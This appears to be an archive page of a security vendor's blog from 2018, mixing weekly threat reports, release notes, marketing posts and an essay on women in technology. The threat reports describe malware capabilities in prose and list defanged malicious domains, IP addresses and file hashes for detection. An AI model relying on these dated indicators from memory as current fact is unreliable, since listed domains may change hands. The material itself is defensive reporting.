Larry Cashdollar, a security researcher from Akamai SIRT, has recently discovered a zero-day vulnerability in jQuery File Upload plugin (CVE-2018-9206). This vulnerability enables the attackers to upload malicious files to servers, such as rootkits, backdoors, and other malware. Based on Cashdollar’s research, the vulnerability has been exploited before 2016. There was an uploaded video in YouTube dating back to August 2015 about bug tutorials in jQuery File Upload, noting that hackers have been widely exploiting the vulnerability.

Cashdollar notified the vulnerability to Sebastian Tschan (aka Blueimp), a German developer who authored the jQuery File Upload plugin. Tschan conducted his own research and found out that the root cause lies in the security changes via “.htaccess” in the Apache Web Server (Apache HTTPD Server Version 2.3.9) dating back to 2010. This update allows the owner to ignore custom security settings for individual directories. Unknowingly, the jQuery File Upload plugin of Tschan rely on “.htaccess”, which was active by default. All versions of the plugin are vulnerable up to 9.22.1.

The plugin has been integrated to thousands of projects such as content management systems (CMS), customer relationship management (CRM), intranet solutions, WordPress plugins, Drupal add-ons, and Joomla components - to name a few. The jQuery File Upload plugin has been forked in GitHub over 7,800 times. Cashdollar has used his proof of concept (POC) and tested 1,000 of 7,800 forks of the GitHub plugin and found out that all were exploitable. But GitHub forks of this vulnerable code are only one part of the problem. There is no way to track applications that have integrated jQuery File Upload plugin without forking through GitHub. Cashdollar has notified US-CERT due to the seriousness of the vulnerability.

This is a critical vulnerability and can allow an attacker to remotely gain control of vulnerable applications. It is amazing that this hasn’t been discovered more recently since it has been on YouTube for three years. It’s time to start writing YouTube scrapers into our open source intel tools. If you are using a jQuery File Upload plugin or a forked version of this vulnerable code in your application, you should upgrade immediately. If you’re including unknown open source code into your application, you should attempt a security review of the code.

75,000 Individuals’ Records Compromised from

AP News reports that roughly 75,000 individuals’ records have been compromised in a security breach. On October 19, 2018, the Centers for Medicare and Medicaid Services (CMS) released an official statement explaining that on October 13 they detected suspicious activity in the Federally Facilitated Exchange’s (FFE’s) Direct Enrollment Pathway. A system designed to allow agents and brokers to help customers apply for coverage in the FFE. An official data breach was declared on October 16. CMS states that agent and broker accounts associated with the suspicious activity were deactivated and the Direct Enrollment Pathway for agents and brokers was also disabled.

Officials determined that roughly 75,000 individuals’ records were accessed during the breach but note that this is a “small fraction” of the FFE’s total consumer records. CMS officials are currently working to identify all individuals impacted by the breach so that they may be notified and offered credit protection. CMS officials also state that open enrollment on HealthCare[.]gov and the Marketplace Call Center are presently available for the general public. A more secure Direct Enrollment Pathway system will be restored for agents and brokers within the next seven days. The statement adds that CMS is in the beginning stages of the assessment of the breach.

Since only some suspicious accounts were associated with the suspicious activity it is likely that this was the result of weak passwords being brute forced or password stealing malware on users’ machines.

Release the Kraken: New Variant on Kraken Cryptor Ransomware

Bleeping Computer has recently published a report about a new variant of Kraken Cryptor ransomware being distributed via malvertising and through the RIG exploit kit. The new Kraken Cryptor version 2.0.6 was first detected by security researchers @nao_sec and @kafeine and shared with Bleeping Computer.

Through the shared file hashes and information, Bleeping Computer was able to determine that this ransomware was able to infect 217 unique victims globally since October 20, 2018. Interestingly, this new variant connects to “” during different stages of the encryption process. It is still not certain on what the motive is for connecting to BleepingComputer during encryption. BleepingComputer owner Lawrence Abrams says it is just to poke on them since BleepingComputer has tackled Kraken Cryptor ransomware in the past.

The request to the URL shortening services is encrypted. So, you likely won’t be able to see the user-agent or referrer unless you utilize a forward proxy to inspect outbound traffic. However, you should see an encrypted connection to domain and then a redirect to


  • 2no[.]co (legit url shortening service)
  • bleepingcomputer[.]com (legit site haunted by a vengeful ghost)

HTTP User-agent:

  • Kraken web request agent/v2.0.6

HTTP Referrer:

  • country code + drive size + status

We know that Ransomware can be scary, so we asked Perchy to look around for this new variant. Perchy says, no traffic in the last 30 days is consistent with indicators for the newly released variant of Kraken Cryptor. All Perch customers are clear, and no infection was seen.

Release Notes

October 19, 2018

  • Dashboard: List all the SLAs available to an organization
  • Indicators: STIX2 models for Django and PostgreSQL
  • Perchybana: Query dns/flow indices with company ID in name
  • Sensor: Put sensor files behind a Perch subdomain
  • Settings: Create a new organization for MSSP users
  • Settings: List all the MSSPs an organization is managed by

  • Communities: Fix issue with community feeds
  • Docker: Fix issues with
  • Email: Serialize request as JSON
  • Email: Use string format vs SMTP format
  • Perchybana: Fix QA perchybana
  • Sensor: Change permission to TeamMembers

  • Sensor files are behind a Perch subdomain
  • Some ES dns/flow indices now have Company ID in the name
  • MSSPs can create and link new organizations from settings
  • Life support for ElasticSearch through assumed AWS turbulence

Threat Report Thursday October 17th 2018

on October 17, 2018

Welcome back to the Perch weekly threat report. Over the last week there has been a lot of security related news, but we’re focusing on a ransomware outbreak reported by a state-run utility and spotlighting one of Zeus’ lesser-known offspring, Panda Banker.

Ransomware Demands Flushed by North Carolina Sewer Authority

Disaster recovery plans are essential when attempting to recover from a ransomware attack, as shown recently by Onslow Water and Sewer Authority. That may include ready-to-restore backups or having manual processes in place for different disaster scenarios. If ransomware isn’t a scenario you plan for, you should.

According to an official statement released Monday, October 15, 2018, Jacksonville, North Carolina-based Onslow Water and Sewer Authority (ONWASA) suffered an attack that resulted in malware infection. The company states that on October 4th, they began experiencing persistent virus attacks from Emotet malware. On Saturday, October 13, at 3AM local time, the company states that Emotet dropped Ryuk ransomware, which spread along the network, rapidly infecting databases and files. ONWASA refused to pay the ransom and instead chose to “undertake the painstaking process of rebuilding its databases and computer systems from the ground up.” The attack did not expose customer information, nor did it interrupt water and wastewater services to homes and businesses.

The statement notes that the incident is similar to another ransomeware attack on official county computer systems in Mecklenburg County, North Carolina, which occurred last year. An FBI spokesperson confirmed that they are currently investigating the incident.

The faster a threat is detected the less it costs to remediate. That’s why having threat detection and a SOC in place is key. Had this attack been caught at the initial Emotet infection and stopped, it would have cost less than responding to a ransomware outbreak.

Malware Spotlight: Panda Banker

I heard sunlight is the best disinfectant. So this week we’re decided to shine some light on the well-maintained Panda Banker malware, a variant of the Zeus banking trojan.

Researchers have identified that Panda Banker has been updated numerous times and has remained active since 2016. Recently, Panda Banker is being installed by the Emotet malware. The attack appears in the form of a malspam phishing campaign that uses weaponized Microsoft documents that deploy the payload. Researchers note that financial institutions and other video streaming service/e-commerce company were targeted in Japan. Other primary targets were organizations from United States and Canada.

Researchers note that the malware has a sophisticated attack cycle, combined with heavily coded obfuscation techniques and multi-encryption layering. After execution, it first checks if it is running in a sandbox, then creates a copy of itself. The malware then creates two “svchost.exe” and injects it with the Trojan. It downloads the configuration from its C&C Server and injects a DLL to intercept traffic through API hooking.

Panda Banker uses the Mersenne Twister algorithm to generate a URL to connect to its C&C Server. Panda Banker will lie in wait until the infected browser visits a targeted website, such as an online banking system, credit card company, and blockchain information. The malware will then steal bank or credit card details, personal data, and web wallet information. This campaign shows that financial gain is a major factor in how Trojans are being used by threat actors.

The Perch SOC regularly goes thrunting, a term they lovingly created for threat hunting, for observables in all customer environments. If you’re a customer, good news! We’ve checked your security event data for over 200 indicators related to Panda Banker. We found no signs of Panda Banker being downloaded or smuggling bits out of your environment. At Perch, we enable customers to see further because we give a flock. Below is a list of domains Perch found linked from malspam.


  • apx[.]email
  • carolinegraham[.]me
  • carvanadenver[.]com
  • carvanamemphis[.]com
  • carvananashville[.]com
  • colleenmansfield[.]com
  • genesisatoxmoor[.]com
  • genesiseastlouisville[.]com
  • genesisofeaslouisville[.]com
  • genesisofindiana[.]com
  • genesisofwestlouisville[.]com
  • jclgraham[.]com
  • laurengraham[.]me
  • michaelagraham[.]com
  • newlacafe[.]com
  • oxmoorusedcars[.]com
  • pegasussoilsolutions[.]com
  • pegasussoilsolutionsllc[.]com
  • sellittooxmoor[.]com
  • selltooxmoor[.]com
  • zombiedebtslayer[.]com



How Customer Feedback Becomes Features

on October 16, 2018

Our customers have a strong voice. Remember Perch’s first customer was not too long ago. Starting with that very first one we have always catered to the needs of our customers. Since the beginning, our goal has been customer experience and satisfaction. This extends past the users of our products and into the customer’s overall experience with Perch. It’s not just our stakeholders guiding our roadmap and pushing new features, but our customers as well.

We offer our customers (more specifically at this point we are referring to users) many ways to communicate their feedback with us. Feedback can be as simple as a Slack message, email, all the way to offering feedback during our monthly (-ish) users call where we invite all of our users to join. As a startup, we have a unique opportunity to cater to our customers more than say a large enterprise that would probably automatically turn your feedback into a ticket in some backlog somewhere. We will have conversations and even meetings to listen to your feedback.

Perch methods of communication

This applies to all users, not just our external customers, but our internal users as well. Currently, the heaviest users of the app are the users of our own Security Operations Center (SOC) . We have done a lot to improve their workflow which in turn improves the app for all users.

What do we do with that feedback?

We make a ticket and shove it deep into our backlog. Kidding (that’s the other guys 😉). Like I was saying, we take the time to understand your wants and needs. Sometimes it’s simple and sometimes it requires larger discussions. We then take that feedback and turn it into acceptance criteria in our ticketing system. These tickets are all hand written by a member of our team.

Here at Perch we encourage tickets and even have fun little automated messages to remind our team members that tickets 👏🏻 are 👏🏻 encouraged 👏🏻.

Make 👏 a 👏 ticket 👏

Our custom Slackbot response

After the ticket is written, we place it into our backlog. All tickets are looked at agnostically, whether it came from a large stakeholder or our smallest customer. Your feedback, turned ticket, may actually go to the bottom of the list after all; but it may also go right up to the top. Especially, if many users share similar feedback about a particular item.

Okay it’s a ticket, now what?

Not all tickets are features. Bugs or things that don’t work quite right are also ticket-ized, as well as a handful of other tasks. This feedback is just as important. For the sake of this article, let’s assume the customer is requesting a new feature.

Depending on what the feature is, it may land in the lap of the design team (aka the best team aka my team 👨🏻‍🎨🌈) to interpret the feature visually before development begins. Sometimes it’s just a mockup, but can also include user flows, mind maps, and animated prototypes. The designers work closely with the developers as a singular product team, constantly comingling (because we don’t like silos ☹️). This assures the customer’s feedback is correctly translated at all stages.

We will often share these mockups during the users call I mentioned earlier. We may even reach back to the customer who originally gave us the feedback for their thoughts on the design. We want as much input as possible before development even begins to streamline the process.

Once it’s ready to develop our engineers (which is what coders like to be called these days 😉) will turn it into reality with their magic-like skills.

A programmer at work

Launching new features

Once it’s ready to go we push it to our QA environment where we do a bit of testing. From here we push it to production where we get it into the hands of our users. We will even release beta features to production because we want it in our users’ hands to give us more feedback and help improve the feature.

We admit we are not perfect and don’t always nail it 100% of the time. That’s not realistic, especially for a fast-moving startup. We release features knowing that even if we think it’s perfect - there is always room for improvement. Another reason why we happily invite feedback.

Real world examples

One feature from the app that comes to mind is the Since You’ve Been Gone feature released not too long ago.

Since You've Been Gone Feature

Since You've Been Gone Feature

A few users - particularly ones that did not log in often - wanted to see what has happened since they were gone. If you don’t already know, our SOC works around the clock fighting off threaty threats for you. So even if you don’t take any action within the app, a lot might have happened while you were gone.

We went through the whole process mentioned above to get this feature into our app - all starting with customer feedback!

Feedback to feature lifecycle

All of this to say

All of us at Perch want our customers to be happy. Tell us what you want to see in our app and we’ll build it for you (probably 😝). It’s a simple idea, certainly not a novel one, but one that not many companies can actually achieve. At least not with our level of love and care ❤️.

Threat Report Thursday October 11th 2018

on October 11, 2018

This week we’re covering three current events. The first two are related to threats targeting the financial sector. The last is a cautionary tale of malware infection at a large restaurant chain.

APT38 is getting SWIFT

In a report published October 3, 2018, FireEye detailed the activities of APT38, a threat actor conducting financially motivated and cyber-espionage related crimes on behalf of the North Korean regime. FireEye identifies APT38 as a North Korean Nation State sponsored group sharing overlapping characteristics with both Lazarus Group and TEMP.Hermit. According to their findings, APT38 executes sophisticated bank heists resulting from extensive planning and maintains long periods of access on a compromised victim’s environment. APT38 was linked to multiple incidents targeting SWIFT systems. APT38’s primary goal is to raise large sums of money for the North Korean regime; however, FireEye states that they also target infrastructure to facilitate continuous operations and evade detection.

APT38 primarily targets financial institutions such as banks, credit unions, and financial transaction and exchange companies. Other targeted organizations include media companies and government entities. Known victims reside in the following countries: the United States, Mexico, Brazil, Chile, Uruguay, Poland, Turkey, Russia, Bangladesh, Malaysia, Vietnam, and the Philippines. In Annex B of the report, FireEye details an extensive list of malware used by APT38, including established, well-known tools (NestEgg, DarkComet) to lesser-known tools (DyePack, BLINDTOAD). FireEye believes APT38 is a well-resourced and persistent threat likely to continue its illicit financial-crime activities.



Betabot continues to evolve its toolset for breaking the bank

Security researchers from Cybereason have detected a new campaign involving the Betabot (Neurevt) Trojan. Betabot first appeared in 2012 as an info-stealer and evolved as a banking trojan packing with destructive features. This updated version has functions like browser form grabbing, File Transfer Protocol (FTP) and mail client stealer, banker module, running distributed denial of service (DDoS) attacks, USB infection module, Robust Userland Rootkit (x86/x64), Arbitrary command execution via shell, and crypto-currency miner module. Betabot can also drop other malware and gain persistence via Windows Task Scheduler and Registry Autorun. Researchers note that the Betabot was designed to operate in “paranoid mode.” It includes self-defense mechanisms such as anti-debugging, anti-virtual machine/sandbox, anti-disassembly, and detect at least 30 security products and analysis tools and try to disable/remove them.

The malware is carried out using phishing attack with social engineering tactics. The email persuades the user to open an attached weaponized Microsoft Word document as the Betabot malware exploits CVE-2017-11882, an 18-year old vulnerability in the Equation Editor tool in Microsoft Office. The vulnerability was discovered in 2017 and patched by Microsoft. It communicates with its C&C Server after checking internet connection by sending requests to and Microsoft Update Sites. Researchers note that to prevent Betabot infections, users should keep their software up to date, install Microsoft Security patches, and avoid opening attachments from unknown senders.




Malware gets year-long all you can eat burger time pass

Restaurant chain Burgerville has recently revealed a security breach that has started over a year ago. Based on the online report, the Federal Bureau of Investigation (FBI) contacted Burgerville last August 2018 about a security incident involving FIN7 which was thought to be “brief intrusion” that no longer existed. By September 19, FBI informed Burgerville that the attack is still active, and was much more severe than expected. Burgerville took steps for remediation, and in cooperation with the FBI and an outside cybersecurity firm, they launched a full forensic investigation. Based on the investigation, the malware was installed on Burgerville systems such as Point of Sales (PoS) machines to steal customer data. Customer’s credit and debit card information such as names, card number, expiration dates, and CVV numbers may have been compromised. The number of affected customers is currently unknown, as the tactics of FIN7 were said to be sophisticated and adept at concealing their digital footprints.

Burgerville explained that they didn’t announce the breach sooner to maintain the confidentiality of the breach during the investigation with the FBI. The remediation plan, which was completed by September 30, has to be kept secret. As part of their remediation plan, Burgerville has also upgraded their systems to counter this kind of attack. The company has asked their customers who have visited their restaurants and used their cards between September 2017 to September 2018 to monitor their financial statements for fraudulent activities.

The longer a threat goes undetected the more expensive it is to remediate. Security programs can be expensive if you go it alone. If Burgerville had a team of security analysts monitoring and didn’t rely on FBI notification, they would have caught the initial and continued infection.



What Managed Service Providers Need When it Comes to Security

on October 9, 2018

Having spent 20+ years helping transform IT and security in enterprise organizations and small businesses alike, I have seen it all. But helping the organizations that don’t have their own IT staff or security program is something that is crucially important to the success of the vast majority of all businesses in the nation. This is where our strategic partnerships with Managed Service Providers really shines.

Managed Service Providers, also known as MSP’s, are the IT and security department for those organizations that aren’t large enough to have their own IT staff. The SBE council estimates that 98.2% of businesses have fewer than 100 employees, the exact target market for many MSP’s. But what does this mean for the owner of an MSP that is likely part of the above demographic?

Antivirus, Firewalls, Compliance, Phishing, Malware, Hacking, Breaches, User Awareness Training; these are some of the things a Managed Service Provider thinks of when they think about securing their customers. The task of ensuring your customer and clients are secure is a daunting task for many organizations, and one area is often overlooked: visibility and actionable outcomes.

Perch provides visibility with real world threat intelligence in an intuitive and easy to use interface. Real-time visibility is critical to the success of any security program. Especially, when implemented in a way that doesn’t cause you to restructure your existing IT and information security processes, rip and replace toolsets, spend countless hours to train staff, and add headcount. When you compare Perch to the typical SOC-as-a-Service (SOCaaS) solution, we prefer to integrate into the toolsets that you are most comfortable with. With Perch you will be up and running in a few minutes (no joke!) as opposed to weeks like other solutions. Perch was designed from the ground up by practitioners with real world IT and information security experience in organizations both large and small.

Some of the world class functionality that that Perch offers:
- We deliver world class threat detection capabilities you’d expect from an IDS.
- Visibility into network traffic that you can only get from large network monitoring vendors.
- SOC services that scale with your needs – if you have your own SOC – awesome, if you don’t, use ours!
- Easy implementation you’d expect from a well-designed product.
- Perch was designed for multi-tenancy out of the box, so the management flow of multiple companies is intuitive and seamless.

As you see, an MSP has a lot to consider in the realm of IT and information security. Therefore, MSP’s add Perch to their security stack because it provides consistent visibility into their customer and client networks in an easy and repeatable fashion. If you’re interested in a demo of Perch, head over to our page.

Release Notes

October 5, 2018

  • Email: Added SLA info to emails and migrated to new email-service

  • DB: Fixed database migration conflicts
  • Email: Fix for weekly email summary not sending
  • Sensor: Fix sensor health page and add MSSP permissions

Perch Security Secures $9 Million Series A Funding Led by ConnectWise, Inc.

on October 4, 2018

Perch Security announced today $9 million in Series A funding, through a combined investment from ConnectWise and existing investor Fishtech Group. The funding will fuel Perch’s expansion in software development, marketing and customer success. ConnectWise Founder and CEO Arnie Bellini will join Perch’s Board of Directors.

Check out the full article here.

Threat Report Wednesday October 3rd 2018

on October 3, 2018

In this weekly threat report, we’ll cover three current events. Facebook loses 50 million auth tokens, a phishing campaign is evading AV to deploy remote access trojans, and a ten-year-old privilege escalation vulnerability has major Linux distributions scrambling to release.

Facebook loses control of auth tokens used for FB and every site you log into using Facebook SSO.

On Friday, September 29, Facebook announced an attacker exploited a vulnerability and potentially compromised up to 50 million users Facebook accounts. The vulnerability exposed user access tokens in the HTML of the site page. Facebook published a statement on this incident, which it later updated with further technical details describing the nature of the vulnerability as the combination of three unknown flaws in a feature known as ‘View As.’

The statement included the following:

“Earlier this week, we discovered that an external actor attacked our systems and exploited a vulnerability that exposed Facebook access tokens for people’s accounts in HTML when we rendered a particular component of the ‘View As’ feature. The vulnerability was the result of the interaction of three distinct bugs:

First: View As is a privacy feature that lets people see what their profile looks like to someone else. View As should be a view-only interface. However, for one type of composer (the box that lets you post content to Facebook) — specifically the version that enables people to wish their friends happy birthday — View As incorrectly provided the opportunity to post a video.

Second: A new version of our video uploader, introduced in July 2017, incorrectly generated an access token that had the permissions of the Facebook mobile app.

Third: When the video uploader appeared as part of View As, it generated the access token not for you as the viewer, but for the user that you were looking up.”

Fifty million users were potentially affected by this vulnerability. As a precaution, Facebook has reset the tokens. However, it does nothing to resolve the potential data an attacker may have stolen.

Facebook confirmed that these access tokens might have been used to login to third-party sites via Facebook’s SSO. According to a 2015 report by Gigya, Facebook had the largest share of all identity providers at a 64% share of social login. This aspect of the breach makes it particularly nasty and should remind everyone of the risk of centralized authentication and single sign-on.






Phishing expedition dodges AV to land Adwind RAT

Security researchers from Cisco Talos with ReversingLabs have released a report regarding a new campaign dropping Adwind Trojan. This new phishing spam campaign spreads the Adwind 3.0 RAT which infects Windows, Mac OSX, and Linux operating systems. The spam email contains weaponized malicious “.csv” and “.xlt” file attachments to entice the user to open.

Adwind 3.0 has a set of new tools, especially an evasion technique by utilizing the Dynamic Data Exchange (DDE) code-injection technique. This DDE, which transfer data between applications, compromises Microsoft Excel. Microsoft Excel opens by default the two droppers found in this campaign, the “.csv” and “.xlt.” Researchers note that this is part of the obfuscation technique applied wherein signature-based anti-virus aren’t able to detect. Instead of identifying that it is a malicious file, it prompts that it is corrupted. If the user opens the file, it executes the dropper. It creates a Visual Basic script that uses bitsadmin tool, which loads the final Java archive payload that contains Adwind installer.

This kind of injection has been used for years, but the treat actor was able to customize it to have an extremely low detection ratio. Other functions of this RAT includes log keystrokes, take screenshots, take pictures, transfer files, or execute any other command from its C&C Server. Researchers have verified that the malware has been targeting mostly Turkey and Germany, but many malware samples have also been detected in the US, India, Vietnam, and Hong Kong. Researchers have noted that sandboxing and behavior-based detections should be able to detect and stop this spam campaign.


Reversing Labs

Talos Intelligence


  • 93a482e554e2a37e6893fdd8cd92537c0ebc7363ac5fac44b7a4af4a2088ea24
  • 0af2c5a46df16b98b9ab5af0ec455e98f6e1928c10ed8b6ffec69573498bdd8a
  • 93280872f685f9c26d5f668ca1303f224a38d2b86ba707cdbb3d57427396e752
  • 0a2f74a7787ae904e5a22a3c2b3acf0316c10b95fae08cced7ca5e2fcc7d9bf8
  • 65220dae459432deb1b038dbcbf8a379519a1a797b7b72f6408f94733bc5a2c2


Mutagen Astronomy (CVE-2018-14634) creates a deep impact on Red Hat, CentOS, and Debian

Risk managers better get that VRM and start checking on vendor patch levels. Security researchers from Qualys have discovered a vulnerability named Mutagen Astronomy (CVE-2018-14634) that affects Red Hat Enterprise Linux (RHEL), CentOS, and Debian users. The critical vulnerability can be used for Local Privilege Escalation (LPE)on 64-bit systems. An integer overflow triggers the vulnerability in the create_elf_tables() Linux kernel function. If exploited, it causes a buffer overflow that executes malicious code with root privileges. According to researchers, Mutagen Astronomy was present in the Linux kernel between July 19, 2007 (kernel commit: b6a2fea39318) and July 7, 2017 (kernel commit: da029c11e6b1). Researchers were able to publish two proof of concept (PoC)s for Mutagen Astronomy. The Red Hat Team has confirmed this vulnerability. Some releases have been patched while some are still vulnerable. If a fix has not been released for your version, a patch is available.







Threat Report Thursday September 28th 2018

on September 28, 2018

This week we are covering three emerging stories in the weekly threat report. First, we’ll cover a newly discovered case of ATM skimmers being installed at banks. Then we’ll transition to two digital threats. The first is related to the reuse of breached credentials in brute force attacks against the financial sector and the second is related to Microsoft’s battle against phishing attacks targeting the upcoming mid-term elections.

Two ATM Skimmers Found at Old Second Bank

Authorities from Aurora Police Department are investigating ATM skimmers found at two Old Second Bank branches in Aurora. The first ATM skimmer was found at 1300 block of North Farnsworth Avenue by an Old Second Bank employee at around 6:30AM. The employee saw a woman walking up to the ATM and acting suspiciously. When the woman left the area, the bank employee checked the ATM with the ATM skimmer and notified other branches of possible skimming which in turn identified the second ATM skimmer at the Fox Valley branch. Investigators are looking through security footages and already released surveillance photos related to the ATM skimming incident. The police are advising bank account holders to immediately report any possible identity or card theft to their bank.


Chicago Suntimes

Credential Stuffing Attacks Focused on Financial Sector

Cybersecurity firm Akamai has recently released its “2018 State of the Internet / Security – Credential Stuffing Attacks Report”. The report shows that organizations, particularly in the financial sector, should be cautious about credential stuffing attacks. Credential stuffing is considered to be login attempts utilizing passwords recovered from a breach. The trend of malicious login attempts is on the rise because botnets are being used to automate credential stuffing, and according to the researchers, it has a Distributed Denial of Service (DDoS) effect. Researchers have documented over 30 billion malicious login attempts from November 2017 to June 2018.

Akamai recorded two particular cases of credential stuffing with the use of heavy-handed botnet operation. First is an unnamed Fortune 500 company where login attempts average from 50,000 an hour to over 350,000 in a single afternoon. The botnet generated 8.5 million malicious attempts in six days. The second is a US credit union that receives 45,000 login attempts every 60 minutes. Another botnet that used a brute-force attack generated 4.2 million attempts in 7 days. Researchers have noted that the US, Russia, and Vietnam are the primary sources of credential stuffing attacks.

Researchers have mentioned that credential stuffing attacks are continuously evolving their methodologies - from volume-based noisier attacks to stealthy low and slow attacks. Without the right defense and expertise, top to bottom organizations alike would fall victim to such attacks.





APT28 Uses Bitcoin to Register Midterm Election Phishing Domains

RiskIQ conducted an investigation into domains that Microsoft sink-holed, which were used in phishing activity that Microsoft attributed to APT28. Microsoft was able to tie the domains in question back to APT28 by tracking historical infrastructure and following the tactics, techniques, and procedures (TTPs) associated with the group over the past few years. The domains were styled to mimic US Senate domains, along with think tanks Hudson Institute and the International Republican Institute. These domains are currently sink-holed at Microsoft’s IP The subdomains target mail servers, or emulate Microsoft products, associated with the domains below:

  • senate[.]group [adfs.senate[.]group]
  • my-iri[.]org [[.]org]
  • hudsonorg-my-sharepoint[.]com [Mail.hudsonorg-my-sharepoint[.]com]
  • office365-onedrive[.]com [Mail.office365-onedrive[.]com]
  • adfs-senate[.]email
  • adfs-senate[.]services

RiskIQ found that APT28 exclusively used domain registrars and hosting providers that accept Bitcoin as payment. This is typical for APT28, who maintain multiple command and control servers for varying durations, cycling the hosting IP, while using registrars that accept Bitcoin, fake phone numbers and names, and use of a registrant email address derived from the domain being registered. The connection to old infrastructure was on the IP 154.16.138[.]57 which hosts vpn647639221.softether[.]net, a VPN service abused by APT28 according to the Department of Justice. This IP also hosted ‘mail[.]office365-onedrive[.]com’ on June 26th. The domains also had connections to disinformation campaigns, as the domain americafirstpolitics[.]com is hosted on Namecheap’s IP,, which also hosts of office365-onedrive[.]com. Historical information shows the domain americafirstpolitics[.]com hosting typical disinformation articles and content.

Hosting providers abused by APT28 include Bacloud, Frantech, GloboTech Communications, Info-Tel, MonoVM, Namecheap, Public Domain Registry, and Swiftway. Domains were hosted on various IPs, from rapid cycling that lasted less than a month to domains on Bacloud that were hosted for nearly a year (adfs-senate[.]services was hosted on 185.25.51[.]64 from September 2017 to August 2018). RiskIQ noted that some subdomains were hosted only for a day or two before being taken offline, saying “APT28 [may have] launched attacks from these domains then rapidly disabled routing/hosting to avoid detection or capture of their phishing or malware pages.”

Several of the servers had open ports used for Microsoft’s remote desktop protocol, while others presumably ran SSH on port 22. Almost all, except, ran HTTP with a few running HTTPS as well. The IPs and had some ports open that were almost matching, the only differences being the former having port 22 open while the later opened 49157, which is usually assigned dynamically. Interestingly, they also have ports open, typically used, for NetBIOS and Distributed COM Service Control Manager, which should not be exposed to the internet as it can be used to quickly identify every DCOM-related server/service running on a machine for exploitation. The IP had port 25 open, which is used for SMTP and could be indicative of its use for sending phishing emails.


  • americafirstpolitics[.]com
  • adfs-senate[.]email
  • mail[.]office365-onedrive[.]com
  • adfs-senate[.]services
  • my-iri[.]org
  • office365-onedrive[.]com
  • senate[.]group
  • adfs[.]senate[.]group
  • mail[.]hudsonorg-my-sharepoint[.]com
  • sharepoint[.]my-iri[.]org
  • hudsonorg-my-sharepoint[.]com
  • vpn647639221[.]softether[.]net






Women in Technology: Are things changing?

on September 24, 2018

In preparation for this blog, I decided to do a little research on the subject matter because, well #obvious. I started with the basic Google search of Women in Technology and found Tweets, a couple blogs, and a website literally called At a casual first glance, it seemed like the basic stuff: blogs, ads, social media, etc. But when I took a deeper dive, I realized that almost everything listed was inspirational, spoken with a “women helping other women” voice and tonality, almost as if this was a crisis before it was a concept. Also, where were all the women?

My research took me down an alternate route as I dug a little deeper on this subject and more and more I was hit with how little women are actually in the tech industry. My blog, which was originally outlined as a, Women in Technology: A Force to be Reckoned With, quickly shifted tones to, What Women in Technology?

As a woman, I couldn’t help but ask myself, why? Why in a world where women can be all things – from scientists to artists – would shy away from something as fascinating as technology?

I’m seeing a pattern here, and it’s not all polka dots.

Prior to joining Perch, I worked in marketing/customer relations for a real estate app, and even before that as a marketing director for a company that designed software for green (sustainable) building engineers. You could say the last seven years of my career have been somewhat tech-related, but in looking back, I noticed one major trend: in all three companies men made up 90% of the workspace.

Without making the heads of my co-workers any larger (you can meet them all here) I am honestly surrounded by some highly talented, brilliant individuals, albeit mostly men. I know Perch and my previous companies aren’t anomalies when it comes to the women-to-men ratio, but it’s still something I noticed. The people I work with outside this organization are primarily men and the few women who are employed share similar roles to me or to each other; marketing, finance, event planning, etc.

Christy Coffey, EVP of Operations for MSPISAO, is a very nice rarity when it comes to this. She is one of the few female EVPs in this industry and is very unapologetic for it.

“I started my career writing software when there were very few women in technical positions. I distinctly remember being a database administrator in the late 90’s on a team of ten men. A decade and half later, I transitioned into cybersecurity where there is a shortage of skilled workers and few women.” said Coffey.

“I am encouraged though. There are organizations like the “Women in Cybersecurity (WiCyS)” who are dedicated to filling unfilled cybersecurity positions with qualified women, and I’ve noticed an uptick in academic scholarships being made available to women pursuing cybersecurity studies. Hopefully, academic and corporate initiatives can drive culture change. We need to attract women to cybersecurity employment opportunities, and retain them.”

Aside from Mrs. Coffey the majority of the higher positions - the developers, the coders, the CISOs, CEOs and so on - are mainly men. Coincidence? I think not.

According to one article covering women in technology

  • Women make up more than half of the U.S. workforce, but only account for less than 20% of tech jobs.
  • In April of 2017, there were 627,000 unfilled positions in tech, even though tech jobs are flourishing - cyber security, cloud computing, software
  • Young girls are discouraged in pursuing STEM at a young age due to lack of female mentors, hands-on experience and gender inequality.

In a world where #thefutureisfemale, it makes me wonder why this industry, that literally has to be at the forefront of innovation in order to remain relevant, is so behind on the times. Is it the industry? Is it that women are still forced into the same roles they have been for so long and find it hard to break the mold? Is it all the above?

“The tech industry needs more women to ensure its sustainability and success long-term. The inclusion of women in the tech industry will help it succeed long-term and will empower them to build their own success stories in the fastest growing industry worldwide.” — Hilary Laney, CEO of Evia Events.

Change is coming

Women are coming down hard on closing the gender gap and are finally making a statement. Many schools now offer coding as part of the curriculum to kids as young as middle and high-schoolers up through the college level. Pushing aside the fear of dating myself, 20 years ago when I was in high school, there was nothing of the sort offered to us. It wasn’t until many years later I freelanced with a potential start-up called Code Girls, an aspiring company that employed only women coders as outsourced workers, that I knew anything about coding or the lack of females in this space. Now, things are different, or at least, on the way to being different. If you scroll through social media you may be served ads similar to the one below, prompting promise of becoming a UX designer via a pretty girl in glasses. Is this a step in the right direction or just a tactful social media ad? Maybe both, but at least they know they need to start catering to this demographic.

Female UX Designer

High Profile Women in Tech

It wouldn’t be fair of me to skip over the fact that there are many influential women in this industry, going back many, many years. Dating back to Williamina Fleming and the Harvard “computers” in the late 1800s to more recently, Joan Ball, who basically invented online dating. Karen Spärck Jones who introduced the idea and methods of “term weighing” aka “Google-ing”, and the “mother of computing”, Grace Hopper, who back in the 1940’s programmed the Mark 1 computer that brought speed and accuracy to military initiatives. Some more recent women include Sheryl Sandberg, COO of Facebook, Marissa Mayer, CEO of Yahoo, and Susan Wojcicki, Google’s first marketing manager.

While this is inspiring, it still doesn’t compare to the current status of this industry. According to the National Center for Women & Information Technology (NCWIT), 25% of the computing workforce was female in 2015. Additionally, “Women, especially women of color, are essentially “absent” from technology innovation.” (

Percentage Of Women In Tech

Women are shattering the proverbial glass-ceiling and breaking their tethers of stale, outdated careers in search of new options. Women are now running for president, launching multi-million dollar companies (hello, Spanx) and acting as CEO for Fortune 500 companies, such as General Motors, IBM, Pepsico, Progessive, and so many more. Women are among the top neurosurgeons, attorneys, CEOs, you-name-it in the World, and it only seems to be getting better. Who knows why it lacks in tech, and if or when that will change, but I’d like to see where the future takes us. As a little popstar named Beyonce once sang, Who run the world? Girls.

Additional info pertaining to women in the tech industry can be found here.

If you are in the industry and would like to share your story, please reach out to us directly at or via the hashtag #PerchWomenWhoLead.

Need the cheat codes to cybersecurity?

on September 21, 2018

Need the cheat codes to cybersecurity?

